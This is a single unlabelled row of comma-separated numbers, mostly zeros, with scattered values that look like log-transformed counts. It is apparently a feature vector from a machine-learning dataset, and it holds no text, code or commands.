0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.330733340286331, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.1298987149230735, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 1.791759469228055, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.545177444479562, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.6931471805599453, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.1298987149230735, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 1.6094379124341003, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.518263445217986, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.0301047650807, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.58351893845611, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 1.9459101490553132, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 3.8918202981106265, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 6.731743096669168, 0.0, 0.0, 0, 0.0, 0, 5.375278407684165, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.578517662373903, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 2.302585092994046, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 3.58351893845611, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0, 0.0, 5.0301047650807, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.160336650881089, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 10.112432770990234, 0, 0.0, 0.0, 0.0, 9.840079788958109, 0.0, 0.0, 0.0, 0.0, 0.0, 7.408770583887592, 0.0, 0.0, 0.0, 10.137128175207733, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 9.840079788958109, 0.0, 0.0, 0.0, 0.0, 9.453194522336574, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 11.228574125921016, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 5.952096120109145, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 9.897636166013237, 0.0, 0.0, 0, 5.952096120109145, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 